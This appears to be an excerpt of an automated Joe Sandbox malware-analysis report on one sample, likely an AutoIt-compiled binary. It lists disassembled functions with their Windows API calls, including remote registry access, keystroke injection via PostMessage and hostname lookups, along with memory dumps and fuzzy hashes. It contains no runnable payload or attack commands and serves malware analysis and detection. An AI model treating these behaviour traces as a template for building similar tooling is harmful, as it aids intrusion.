• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: -----$SysListView32
• API String ID: 2326795674-3975388722
• Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
• Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
• Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
• Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
• IsMenu.USER32(?), ref: 0045FC5F
• CreatePopupMenu.USER32 ref: 0045FC97
• GetMenuItemCount.USER32(?), ref: 0045FCFD
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
• Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
APIs
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
• VariantClear.OLEAUT32(?), ref: 00435320
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
• VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Cleanup$Startupgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 1500336939-3771769585
• Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
• Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
• Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
• Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(75A705F0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(75A705F0,00001026,00000000,?), ref: 00448E25
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
• Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
• Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
• Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
APIs
• SysAllocString.OLEAUT32(00000000), ref: 00434EE8
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
• SysAllocString.OLEAUT32(00000000), ref: 00434F3E
• SysAllocString.OLEAUT32(?), ref: 00434F64
• SysFreeString.OLEAUT32(?), ref: 00434F6D
• StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
• SysAllocString.OLEAUT32(?), ref: 00434FB6
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                  • Opcode ID: fb16c795eb7b0f8d7e2448c335eae3e8f8c4c2f94b6693942d823ca4d2b0b474
                                                                                                                                                                  • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                                                                                                                                                  • Opcode Fuzzy Hash: fb16c795eb7b0f8d7e2448c335eae3e8f8c4c2f94b6693942d823ca4d2b0b474
                                                                                                                                                                  • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
APIs
• InterlockedDecrement.KERNEL32(?), ref: 004175EC
• InterlockedDecrement.KERNEL32(?), ref: 004175F9
• InterlockedDecrement.KERNEL32(?), ref: 00417606
• InterlockedDecrement.KERNEL32(?), ref: 00417613
• InterlockedDecrement.KERNEL32(?), ref: 00417620
• InterlockedDecrement.KERNEL32(?), ref: 0041763C
• InterlockedDecrement.KERNEL32(00000000), ref: 0041764C
• InterlockedDecrement.KERNEL32(?), ref: 00417662
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: DecrementInterlocked
• String ID:
• API String ID: 3448037634-0
• Opcode ID: 2d90712be0f5ac005b3e143ee6e6a3ff062905945baf7aad3938d434ed8910c2
• Instruction ID: a7806976ab87669462c8841b6c00aae0a755f449dc62de05c426b9540ffcc43f
• Opcode Fuzzy Hash: 2d90712be0f5ac005b3e143ee6e6a3ff062905945baf7aad3938d434ed8910c2
• Instruction Fuzzy Hash: FB113071B04615A7DB109B7DCC84B97B7BDAF44754F184417A508D7244DB78EC80CBB8
APIs
• InterlockedIncrement.KERNEL32(004115F6), ref: 00417555
• InterlockedIncrement.KERNEL32(00006B48), ref: 00417562
• InterlockedIncrement.KERNEL32(61C8E856), ref: 0041756F
• InterlockedIncrement.KERNEL32(FF8BC359), ref: 0041757C
• InterlockedIncrement.KERNEL32(0286E856), ref: 00417589
• InterlockedIncrement.KERNEL32(0286E856), ref: 004175A5
• InterlockedIncrement.KERNEL32(50F0458D), ref: 004175B5
• InterlockedIncrement.KERNEL32(00006DCB), ref: 004175CB
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: IncrementInterlocked
• String ID:
• API String ID: 3508698243-0
• Opcode ID: 135d360ea79174b1c941fff99ef5a2e76c5bdc67544c7251d2319710911153bb
• Instruction ID: 2b54aa213fc303e87487d6d7f5f44cae7e3f65ddbbee17ff61441cf1ee9523fe
• Opcode Fuzzy Hash: 135d360ea79174b1c941fff99ef5a2e76c5bdc67544c7251d2319710911153bb
• Instruction Fuzzy Hash: 2D110C71B04215BBDB109B79CC84BABBBAEAF44344F084827A508D7640CB78E950CBB4
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopySystem
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 134932582-1568723262
• Opcode ID: 753d5363978faa8ebc3d37d1b5a82c34792bd8fa385372e65661eea4c178c1f3
• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: 753d5363978faa8ebc3d37d1b5a82c34792bd8fa385372e65661eea4c178c1f3
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• VariantInit.OLEAUT32(?), ref: 0046C96E
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Variant$Copy$ClearErrorInitLast
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 3207048006-625585964
• Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
• Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c552620f87f23c7d9ba297ce941b2af7893112363b3afb805ddda95799893be9
• Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
• Opcode Fuzzy Hash: c552620f87f23c7d9ba297ce941b2af7893112363b3afb805ddda95799893be9
• Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
APIs
• GetSystemMetrics.USER32(0000000F), ref: 00440527
• MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
• SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
• InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
• ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 1457242333-0
• Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
• Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
• Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
• Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ConnectRegistry
• String ID:
• API String ID: 76216097-0
• Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
• Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
• MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
• AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
• LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
• CloseFigure.GDI32(?), ref: 0044751F
• SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
• Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
• Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
• Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Close$ConnectEnumOpenRegistryValue
• String ID:
• API String ID: 1413298697-0
• Opcode ID: 7cc3fb130c94ff833dd9a48eb64f719431195d72c0eb17414c4753cfa71789d1
• Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
• Opcode Fuzzy Hash: 7cc3fb130c94ff833dd9a48eb64f719431195d72c0eb17414c4753cfa71789d1
• Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
APIs
• GetStartupInfoW.KERNEL32(?), ref: 0041AAAE
  • Part of subcall function 00416B49: Sleep.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00416B71
• GetFileType.KERNEL32(?), ref: 0041ABE1
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FileInfoSleepStartupType
• String ID:
• API String ID: 1527402494-0
• Opcode ID: f5ad439157debf0731eb09ee09d84389162392039795a7b6791dab7457716719
• Instruction ID: 02b76c019d8a3bae1def7e59c842a1f1d399f548cc34b69872dea7f72cfbe790
• Opcode Fuzzy Hash: f5ad439157debf0731eb09ee09d84389162392039795a7b6791dab7457716719
• Instruction Fuzzy Hash: DB6109715063418FD710CF28D98869A7BA1BF06324F244A6ED566CB3E1E738D895C78E
APIs
• CoInitialize.OLE32(00000000), ref: 0045DCAF
• SHGetMalloc.SHELL32(?), ref: 0045DCB9
• CoUninitialize.OLE32 ref: 0045DCC3
• SHGetDesktopFolder.SHELL32(00000000,?), ref: 0045DD62
• SHBrowseForFolderW.SHELL32(?), ref: 0045DE0E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DE30
• CoUninitialize.OLE32 ref: 0045DE7E
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
• String ID:
• API String ID: 2470771137-0
• Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
• Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
• Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
